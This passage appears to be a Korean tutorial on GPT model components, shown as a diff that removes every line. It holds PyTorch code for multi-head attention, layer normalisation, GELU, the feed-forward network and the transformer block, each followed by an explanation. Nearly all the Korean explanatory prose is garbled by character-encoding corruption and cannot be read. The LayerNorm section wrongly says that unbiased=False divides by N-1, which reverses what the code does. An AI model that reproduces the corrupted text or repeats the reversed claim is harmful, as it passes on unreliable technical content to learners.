-queries = queries.transpose(1, 2) -values = values.transpose(1, 2) - -# Compute scaled dot-product attention (aka self-attention) with a causal mask -attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - -# Original mask truncated to the number of tokens and converted to boolean -mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - -# Use the mask to fill attention scores -attn_scores.masked_fill_(mask_bool, -torch.inf) - -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) -attn_weights = self.dropout(attn_weights) - -# Shape: (b, num_tokens, num_heads, head_dim) -context_vec = (attn_weights @ values).transpose(1, 2) - -# Combine heads, where self.d_out = self.num_heads * self.head_dim -context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out) -context_vec = self.out_proj(context_vec) # optional projection - -return context_vec - -class LayerNorm(nn.Module): -def __init__(self, emb_dim): -super().__init__() -self.eps = 1e-5 -self.scale = nn.Parameter(torch.ones(emb_dim)) -self.shift = nn.Parameter(torch.zeros(emb_dim)) - -def forward(self, x): -mean = x.mean(dim=-1, keepdim=True) -var = x.var(dim=-1, keepdim=True, unbiased=False) -norm_x = (x - mean) / torch.sqrt(var + self.eps) -return self.scale * norm_x + self.shift - -class TransformerBlock(nn.Module): -def __init__(self, cfg): -super().__init__() -self.att = MultiHeadAttention( -d_in=cfg["emb_dim"], -d_out=cfg["emb_dim"], -context_length=cfg["context_length"], -num_heads=cfg["n_heads"], -dropout=cfg["drop_rate"], -qkv_bias=cfg["qkv_bias"]) -self.ff = FeedForward(cfg) -self.norm1 = LayerNorm(cfg["emb_dim"]) -self.norm2 = LayerNorm(cfg["emb_dim"]) -self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - -def forward(self, x): -# Shortcut connection for attention block -shortcut = x -x = self.norm1(x) -x = self.att(x) # Shape [batch_size, num_tokens, emb_size] -x = self.drop_shortcut(x) -x = x + shortcut # Add the original input back - -# Shortcut connection for feed forward block -shortcut = x -x = self.norm2(x) -x = self.ff(x) -x = self.drop_shortcut(x) -x = x + shortcut # Add the original input back - -return x - - -class GPTModel(nn.Module): -def __init__(self, cfg): -super().__init__() -self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) -self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) -self.drop_emb = nn.Dropout(cfg["drop_rate"]) - -self.trf_blocks = nn.Sequential( -*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]) - -self.final_norm = LayerNorm(cfg["emb_dim"]) -self.out_head = nn.Linear( -cfg["emb_dim"], cfg["vocab_size"], bias=False -) - -def forward(self, in_idx): -batch_size, seq_len = in_idx.shape -tok_embeds = self.tok_emb(in_idx) -pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device)) -x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size] -x = self.drop_emb(x) -x = self.trf_blocks(x) -x = self.final_norm(x) -logits = self.out_head(x) -return logits - -GPT_CONFIG_124M = { -"vocab_size": 50257, # Vocabulary size -"context_length": 1024, # Context length -"emb_dim": 768, # Embedding dimension -"n_heads": 12, # Number of attention heads -"n_layers": 12, # Number of layers -"drop_rate": 0.1, # Dropout rate -"qkv_bias": False # Query-Key-Value bias -} - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -out = model(batch) -print("Input batch:\n", batch) -print("\nOutput shape:", out.shape) -print(out) -``` -### **GELU ํ™œ์„ฑํ™” ํ•จ์ˆ˜** -```python -# From 
https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class GELU(nn.Module): -def __init__(self): -super().__init__() - -def forward(self, x): -return 0.5 * x * (1 + torch.tanh( -torch.sqrt(torch.tensor(2.0 / torch.pi)) * -(x + 0.044715 * torch.pow(x, 3)) -)) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **GELU (๊ฐ€์šฐ์‹œ์•ˆ ์˜ค๋ฅ˜ ์„ ํ˜• ๋‹จ์œ„):** ๋ชจ๋ธ์— ๋น„์„ ํ˜•์„ฑ์„ ๋„์ž…ํ•˜๋Š” ํ™œ์„ฑํ™” ํ•จ์ˆ˜์ž…๋‹ˆ๋‹ค. -- **๋ถ€๋“œ๋Ÿฌ์šด ํ™œ์„ฑํ™”:** ์Œ์ˆ˜ ์ž…๋ ฅ์„ 0์œผ๋กœ ๋งŒ๋“œ๋Š” ReLU์™€ ๋‹ฌ๋ฆฌ, GELU๋Š” ์ž…๋ ฅ์„ ์ถœ๋ ฅ์œผ๋กœ ๋ถ€๋“œ๋Ÿฝ๊ฒŒ ๋งคํ•‘ํ•˜์—ฌ ์Œ์ˆ˜ ์ž…๋ ฅ์— ๋Œ€ํ•ด ์ž‘์€ ๋น„์˜ ๊ฐ’๋„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ˆ˜ํ•™์  ์ •์˜:** - -
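-This corresponds to the tanh approximation that the code above implements:
-
-```latex
-\text{GELU}(x) \approx 0.5\, x \left(1 + \tanh\!\left(\sqrt{\tfrac{2}{\pi}} \left(x + 0.044715\, x^{3}\right)\right)\right)
-```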
- -> [!NOTE] -> FeedForward ๋ ˆ์ด์–ด ๋‚ด์˜ ์„ ํ˜• ๋ ˆ์ด์–ด ๋’ค์—์„œ ์ด ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋ชฉ์ ์€ ์„ ํ˜• ๋ฐ์ดํ„ฐ๋ฅผ ๋น„์„ ํ˜•์œผ๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ๋ชจ๋ธ์ด ๋ณต์žกํ•˜๊ณ  ๋น„์„ ํ˜•์ ์ธ ๊ด€๊ณ„๋ฅผ ํ•™์Šตํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. - -### **FeedForward ์‹ ๊ฒฝ๋ง** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ํ˜•ํƒœ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class FeedForward(nn.Module): -def __init__(self, cfg): -super().__init__() -self.layers = nn.Sequential( -nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), -GELU(), -nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), -) - -def forward(self, x): -# x shape: (batch_size, seq_len, emb_dim) - -x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim) -x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim) -x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim) -return x # Output shape: (batch_size, seq_len, emb_dim) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **์œ„์น˜๋ณ„ FeedForward ๋„คํŠธ์›Œํฌ:** ๊ฐ ์œ„์น˜์— ๋Œ€ํ•ด ๋ณ„๋„๋กœ ๋™์ผํ•˜๊ฒŒ ๋‘ ๊ฐœ์˜ ์™„์ „ ์—ฐ๊ฒฐ ๋„คํŠธ์›Œํฌ๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์„ธ๋ถ€์‚ฌํ•ญ:** -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** ์ฐจ์›์„ `emb_dim`์—์„œ `4 * emb_dim`์œผ๋กœ ํ™•์žฅํ•ฉ๋‹ˆ๋‹ค. -- **GELU ํ™œ์„ฑํ™”:** ๋น„์„ ํ˜•์„ฑ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** ์ฐจ์›์„ ๋‹ค์‹œ `emb_dim`์œผ๋กœ ์ค„์ž…๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ณด์‹œ๋‹ค์‹œํ”ผ, Feed Forward ๋„คํŠธ์›Œํฌ๋Š” 3๊ฐœ์˜ ๋ ˆ์ด์–ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ฒซ ๋ฒˆ์งธ๋Š” ์„ ํ˜• ๋ ˆ์ด์–ด๋กœ, ์„ ํ˜• ๊ฐ€์ค‘์น˜(๋ชจ๋ธ ๋‚ด๋ถ€์—์„œ ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฐจ์›์„ 4๋ฐฐ๋กœ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, GELU ํ•จ์ˆ˜๊ฐ€ ๋ชจ๋“  ์ฐจ์›์—์„œ ๋น„์„ ํ˜• ๋ณ€ํ™”๋ฅผ ์ ์šฉํ•˜์—ฌ ๋” ํ’๋ถ€ํ•œ ํ‘œํ˜„์„ ์บก์ฒ˜ํ•˜๊ณ , ๋งˆ์ง€๋ง‰์œผ๋กœ ๋˜ ๋‹ค๋ฅธ ์„ ํ˜• ๋ ˆ์ด์–ด๊ฐ€ ์›๋ž˜ ์ฐจ์› ํฌ๊ธฐ๋กœ ๋˜๋Œ๋ฆฝ๋‹ˆ๋‹ค. - -### **๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜** - -์ด๊ฒƒ์€ ์ด์ „ ์„น์…˜์—์„œ ์ด๋ฏธ ์„ค๋ช…๋˜์—ˆ์Šต๋‹ˆ๋‹ค. - -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋‹ค์ค‘ ํ—ค๋“œ ์ž๊ธฐ ์ฃผ์˜:** ๋ชจ๋ธ์ด ํ† ํฐ์„ ์ธ์ฝ”๋”ฉํ•  ๋•Œ ์ž…๋ ฅ ์‹œํ€€์Šค ๋‚ด์˜ ๋‹ค์–‘ํ•œ ์œ„์น˜์— ์ง‘์ค‘ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **์ฃผ์š” ๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฟผ๋ฆฌ, ํ‚ค, ๊ฐ’:** ์ž…๋ ฅ์˜ ์„ ํ˜• ํ”„๋กœ์ ์…˜์œผ๋กœ, ์ฃผ์˜ ์ ์ˆ˜๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **ํ—ค๋“œ:** ๋ณ‘๋ ฌ๋กœ ์‹คํ–‰๋˜๋Š” ์—ฌ๋Ÿฌ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜(`num_heads`), ๊ฐ ํ—ค๋“œ๋Š” ์ถ•์†Œ๋œ ์ฐจ์›(`head_dim`)์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **์ฃผ์˜ ์ ์ˆ˜:** ์ฟผ๋ฆฌ์™€ ํ‚ค์˜ ๋‚ด์ ์„ ๊ณ„์‚ฐํ•˜์—ฌ ์Šค์ผ€์ผ๋ง ๋ฐ ๋งˆ์Šคํ‚นํ•ฉ๋‹ˆ๋‹ค. -- **๋งˆ์Šคํ‚น:** ๋ฏธ๋ž˜์˜ ํ† ํฐ์— ์ฃผ์˜๋ฅผ ๊ธฐ์šธ์ด์ง€ ์•Š๋„๋ก ์ธ๊ณผ ๋งˆ์Šคํฌ๊ฐ€ ์ ์šฉ๋ฉ๋‹ˆ๋‹ค(์ž๊ธฐ ํšŒ๊ท€ ๋ชจ๋ธ์ธ GPT์™€ ๊ฐ™์€ ๊ฒฝ์šฐ ์ค‘์š”). -- **์ฃผ์˜ ๊ฐ€์ค‘์น˜:** ๋งˆ์Šคํ‚น๋˜๊ณ  ์Šค์ผ€์ผ๋œ ์ฃผ์˜ ์ ์ˆ˜์˜ ์†Œํ”„ํŠธ๋งฅ์Šค์ž…๋‹ˆ๋‹ค. -- **์ปจํ…์ŠคํŠธ ๋ฒกํ„ฐ:** ์ฃผ์˜ ๊ฐ€์ค‘์น˜์— ๋”ฐ๋ผ ๊ฐ’์˜ ๊ฐ€์ค‘ ํ•ฉ์ž…๋‹ˆ๋‹ค. -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜:** ๋ชจ๋“  ํ—ค๋“œ์˜ ์ถœ๋ ฅ์„ ๊ฒฐํ•ฉํ•˜๋Š” ์„ ํ˜• ๋ ˆ์ด์–ด์ž…๋‹ˆ๋‹ค. - -> [!NOTE] -> ์ด ๋„คํŠธ์›Œํฌ์˜ ๋ชฉํ‘œ๋Š” ๋™์ผํ•œ ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ํ† ํฐ ๊ฐ„์˜ ๊ด€๊ณ„๋ฅผ ์ฐพ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋˜ํ•œ, ํ† ํฐ์€ ๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋กœ ๋‹ค๋ฅธ ํ—ค๋“œ๋กœ ๋‚˜๋‰˜์ง€๋งŒ, ๊ฐ ํ—ค๋“œ์—์„œ ๋ฐœ๊ฒฌ๋œ ์ตœ์ข… ๊ด€๊ณ„๋Š” ์ด ๋„คํŠธ์›Œํฌ์˜ ๋์—์„œ ๊ฒฐํ•ฉ๋ฉ๋‹ˆ๋‹ค. -> -> ๋˜ํ•œ, ํ›ˆ๋ จ ์ค‘์— **์ธ๊ณผ ๋งˆ์Šคํฌ**๊ฐ€ ์ ์šฉ๋˜์–ด ๋‚˜์ค‘์˜ ํ† ํฐ์ด ํŠน์ • ํ† ํฐ๊ณผ์˜ ๊ด€๊ณ„๋ฅผ ์ฐพ์„ ๋•Œ ๊ณ ๋ ค๋˜์ง€ ์•Š์œผ๋ฉฐ, **๊ณผ์ ํ•ฉ ๋ฐฉ์ง€**๋ฅผ ์œ„ํ•ด ์ผ๋ถ€ **๋“œ๋กญ์•„์›ƒ**๋„ ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. 
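-To make the causal masking described above concrete, here is a minimal, self-contained sketch with made-up numbers (only `torch` is required). Scores above the diagonal are set to `-inf`, so after the softmax each token only attends to itself and to earlier tokens:
-
-```python
-import torch
-
-torch.manual_seed(123)
-
-# Toy attention scores for a sequence of 4 tokens (single head, random values)
-attn_scores = torch.randn(4, 4)
-
-# Upper-triangular boolean mask: True marks "future" positions
-mask_bool = torch.triu(torch.ones(4, 4), diagonal=1).bool()
-
-# Future positions are excluded from the softmax by setting them to -inf
-masked_scores = attn_scores.masked_fill(mask_bool, float("-inf"))
-
-# Each row now sums to 1 and only covers the current and previous tokens
-attn_weights = torch.softmax(masked_scores, dim=-1)  # scaling by sqrt(head_dim) omitted in this toy example
-print(attn_weights)
-```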
- -### **๋ ˆ์ด์–ด** ์ •๊ทœํ™” -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class LayerNorm(nn.Module): -def __init__(self, emb_dim): -super().__init__() -self.eps = 1e-5 # Prevent division by zero during normalization. -self.scale = nn.Parameter(torch.ones(emb_dim)) -self.shift = nn.Parameter(torch.zeros(emb_dim)) - -def forward(self, x): -mean = x.mean(dim=-1, keepdim=True) -var = x.var(dim=-1, keepdim=True, unbiased=False) -norm_x = (x - mean) / torch.sqrt(var + self.eps) -return self.scale * norm_x + self.shift -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋ ˆ์ด์–ด ์ •๊ทœํ™”:** ๋ฐฐ์น˜์˜ ๊ฐ ๊ฐœ๋ณ„ ์˜ˆ์ œ์— ๋Œ€ํ•ด ํŠน์„ฑ(์ž„๋ฒ ๋”ฉ ์ฐจ์›) ์ „๋ฐ˜์— ๊ฑธ์ณ ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **`eps`:** ์ •๊ทœํ™” ์ค‘ 0์œผ๋กœ ๋‚˜๋ˆ„๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ๋ถ„์‚ฐ์— ์ถ”๊ฐ€๋˜๋Š” ์ž‘์€ ์ƒ์ˆ˜(`1e-5`). -- **`scale` ๋ฐ `shift`:** ๋ชจ๋ธ์ด ์ •๊ทœํ™”๋œ ์ถœ๋ ฅ์„ ์Šค์ผ€์ผํ•˜๊ณ  ์ด๋™ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜(`nn.Parameter`). ๊ฐ๊ฐ 1๊ณผ 0์œผ๋กœ ์ดˆ๊ธฐํ™”๋ฉ๋‹ˆ๋‹ค. -- **์ •๊ทœํ™” ๊ณผ์ •:** -- **ํ‰๊ท  ๊ณ„์‚ฐ(`mean`):** ์ž„๋ฒ ๋”ฉ ์ฐจ์›(`dim=-1`)์— ๊ฑธ์ณ ์ž…๋ ฅ `x`์˜ ํ‰๊ท ์„ ๊ณ„์‚ฐํ•˜๋ฉฐ, ๋ธŒ๋กœ๋“œ์บ์ŠคํŒ…์„ ์œ„ํ•ด ์ฐจ์›์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค(`keepdim=True`). -- **๋ถ„์‚ฐ ๊ณ„์‚ฐ(`var`):** ์ž„๋ฒ ๋”ฉ ์ฐจ์›์— ๊ฑธ์ณ `x`์˜ ๋ถ„์‚ฐ์„ ๊ณ„์‚ฐํ•˜๋ฉฐ, ์ฐจ์›์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค. `unbiased=False` ๋งค๊ฐœ๋ณ€์ˆ˜๋Š” ๋ถ„์‚ฐ์ด ํŽธํ–ฅ ์ถ”์ •๊ธฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ณ„์‚ฐ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค(N์œผ๋กœ ๋‚˜๋ˆ„๊ธฐ ๋Œ€์‹  N-1๋กœ ๋‚˜๋ˆ„๊ธฐ), ์ด๋Š” ์ƒ˜ํ”Œ์ด ์•„๋‹Œ ํŠน์„ฑ์— ๋Œ€ํ•ด ์ •๊ทœํ™”ํ•  ๋•Œ ์ ํ•ฉํ•ฉ๋‹ˆ๋‹ค. -- **์ •๊ทœํ™”(`norm_x`):** `x`์—์„œ ํ‰๊ท ์„ ๋นผ๊ณ  ๋ถ„์‚ฐ์— `eps`๋ฅผ ๋”ํ•œ ๊ฐ’์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ๋‚˜๋ˆ•๋‹ˆ๋‹ค. -- **์Šค์ผ€์ผ ๋ฐ ์ด๋™:** ์ •๊ทœํ™”๋œ ์ถœ๋ ฅ์— ํ•™์Šต ๊ฐ€๋Šฅํ•œ `scale` ๋ฐ `shift` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ชฉํ‘œ๋Š” ๋™์ผํ•œ ํ† ํฐ์˜ ๋ชจ๋“  ์ฐจ์›์—์„œ ํ‰๊ท ์ด 0์ด๊ณ  ๋ถ„์‚ฐ์ด 1์ด ๋˜๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Š” **๋”ฅ ๋‰ด๋Ÿด ๋„คํŠธ์›Œํฌ์˜ ํ›ˆ๋ จ์„ ์•ˆ์ •ํ™”**ํ•˜๊ธฐ ์œ„ํ•ด ๋‚ด๋ถ€ ๊ณต๋ณ€๋Ÿ‰ ์ด๋™์„ ์ค„์ด๋Š” ๊ฒƒ์„ ๋ชฉํ‘œ๋กœ ํ•˜๋ฉฐ, ์ด๋Š” ํ›ˆ๋ จ ์ค‘ ๋งค๊ฐœ๋ณ€์ˆ˜ ์—…๋ฐ์ดํŠธ๋กœ ์ธํ•ด ๋„คํŠธ์›Œํฌ ํ™œ์„ฑํ™”์˜ ๋ถ„ํฌ ๋ณ€ํ™”์™€ ๊ด€๋ จ์ด ์žˆ์Šต๋‹ˆ๋‹ค. 
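-A quick numeric check of this behaviour (a sketch, assuming the `LayerNorm` class defined above is in scope; the input values are random):
-
-```python
-import torch
-
-torch.manual_seed(123)
-
-x = torch.randn(2, 4, 768)      # (batch, tokens, emb_dim)
-ln = LayerNorm(768)             # class defined above; scale=1, shift=0 at initialization
-out = ln(x)
-
-# Right after initialization every token vector is normalized to mean ~0 and variance ~1
-print(out.mean(dim=-1)[0, 0].item())                  # ~0.0
-print(out.var(dim=-1, unbiased=False)[0, 0].item())   # ~1.0
-```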
- -### **ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 - -class TransformerBlock(nn.Module): -def __init__(self, cfg): -super().__init__() -self.att = MultiHeadAttention( -d_in=cfg["emb_dim"], -d_out=cfg["emb_dim"], -context_length=cfg["context_length"], -num_heads=cfg["n_heads"], -dropout=cfg["drop_rate"], -qkv_bias=cfg["qkv_bias"] -) -self.ff = FeedForward(cfg) -self.norm1 = LayerNorm(cfg["emb_dim"]) -self.norm2 = LayerNorm(cfg["emb_dim"]) -self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - -def forward(self, x): -# x shape: (batch_size, seq_len, emb_dim) - -# Shortcut connection for attention block -shortcut = x # shape: (batch_size, seq_len, emb_dim) -x = self.norm1(x) # shape remains (batch_size, seq_len, emb_dim) -x = self.att(x) # shape: (batch_size, seq_len, emb_dim) -x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim) -x = x + shortcut # shape: (batch_size, seq_len, emb_dim) - -# Shortcut connection for feedforward block -shortcut = x # shape: (batch_size, seq_len, emb_dim) -x = self.norm2(x) # shape remains (batch_size, seq_len, emb_dim) -x = self.ff(x) # shape: (batch_size, seq_len, emb_dim) -x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim) -x = x + shortcut # shape: (batch_size, seq_len, emb_dim) - -return x # Output shape: (batch_size, seq_len, emb_dim) - -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋ ˆ์ด์–ด ๊ตฌ์„ฑ:** ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜, ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ, ๋ ˆ์ด์–ด ์ •๊ทœํ™” ๋ฐ ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™”:** ์•ˆ์ •์ ์ธ ํ›ˆ๋ จ์„ ์œ„ํ•ด ์ฃผ์˜ ๋ฐ ํ”ผ๋“œํฌ์›Œ๋“œ ๋ ˆ์ด์–ด ์ „์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์—ฐ๊ฒฐ (๋‹จ์ถ•ํ‚ค):** ๋ ˆ์ด์–ด์˜ ์ž…๋ ฅ์„ ์ถœ๋ ฅ์— ์ถ”๊ฐ€ํ•˜์—ฌ ๊ทธ๋ž˜๋””์–ธํŠธ ํ๋ฆ„์„ ๊ฐœ์„ ํ•˜๊ณ  ๊นŠ์€ ๋„คํŠธ์›Œํฌ์˜ ํ›ˆ๋ จ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ:** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ์ฃผ์˜ ๋ฐ ํ”ผ๋“œํฌ์›Œ๋“œ ๋ ˆ์ด์–ด ํ›„์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. - -#### **๋‹จ๊ณ„๋ณ„ ๊ธฐ๋Šฅ** - -1. **์ฒซ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ (์ž๊ธฐ ์ฃผ์˜):** -- **์ž…๋ ฅ (`shortcut`):** ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ์œ„ํ•ด ์›๋ž˜ ์ž…๋ ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™” (`norm1`):** ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ (`att`):** ์ž๊ธฐ ์ฃผ์˜๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_shortcut`):** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ๋“œ๋กญ์•„์›ƒ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์ถ”๊ฐ€ (`x + shortcut`):** ์›๋ž˜ ์ž…๋ ฅ๊ณผ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. -2. **๋‘ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ (ํ”ผ๋“œํฌ์›Œ๋“œ):** -- **์ž…๋ ฅ (`shortcut`):** ๋‹ค์Œ ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ์œ„ํ•ด ์—…๋ฐ์ดํŠธ๋œ ์ž…๋ ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™” (`norm2`):** ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ (`ff`):** ํ”ผ๋“œํฌ์›Œ๋“œ ๋ณ€ํ™˜์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_shortcut`):** ๋“œ๋กญ์•„์›ƒ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์ถ”๊ฐ€ (`x + shortcut`):** ์ฒซ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ์˜ ์ž…๋ ฅ๊ณผ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ณ€ํ™˜๊ธฐ ๋ธ”๋ก์€ ๋ชจ๋“  ๋„คํŠธ์›Œํฌ๋ฅผ ํ•จ๊ป˜ ๊ทธ๋ฃนํ™”ํ•˜๊ณ  ํ›ˆ๋ จ ์•ˆ์ •์„ฑ๊ณผ ๊ฒฐ๊ณผ๋ฅผ ๊ฐœ์„ ํ•˜๊ธฐ ์œ„ํ•ด ์ผ๋ถ€ **์ •๊ทœํ™”** ๋ฐ **๋“œ๋กญ์•„์›ƒ**์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค.\ -> ๊ฐ ๋„คํŠธ์›Œํฌ ์‚ฌ์šฉ ํ›„ ๋“œ๋กญ์•„์›ƒ์ด ์ˆ˜ํ–‰๋˜๊ณ  ์ •๊ทœํ™”๊ฐ€ ์ ์šฉ๋˜๋Š” ๋ฐฉ์‹์„ ์ฃผ๋ชฉํ•˜์„ธ์š”. -> -> ๋˜ํ•œ, **๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ์ž…๋ ฅ์— ์ถ”๊ฐ€ํ•˜๋Š”** ๋‹จ์ถ•ํ‚ค๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ดˆ๊ธฐ ๋ ˆ์ด์–ด๊ฐ€ ๋งˆ์ง€๋ง‰ ๋ ˆ์ด์–ด๋งŒํผ ๊ธฐ์—ฌํ•˜๋„๋ก ํ•˜์—ฌ ์†Œ์‹ค ๊ทธ๋ž˜๋””์–ธํŠธ ๋ฌธ์ œ๋ฅผ ๋ฐฉ์ง€ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค. 
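-A small sanity check of the shape-preserving behaviour described above (a sketch, assuming the `TransformerBlock`, `MultiHeadAttention`, `FeedForward` and `LayerNorm` classes defined above are in scope):
-
-```python
-import torch
-
-torch.manual_seed(123)
-
-cfg = {
-    "emb_dim": 768, "context_length": 1024, "n_heads": 12,
-    "drop_rate": 0.1, "qkv_bias": False,
-}
-block = TransformerBlock(cfg)
-
-x = torch.rand(2, 4, 768)         # (batch, tokens, emb_dim)
-out = block(x)
-
-print("Input shape: ", x.shape)   # torch.Size([2, 4, 768])
-print("Output shape:", out.shape) # torch.Size([2, 4, 768]) - unchanged
-```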
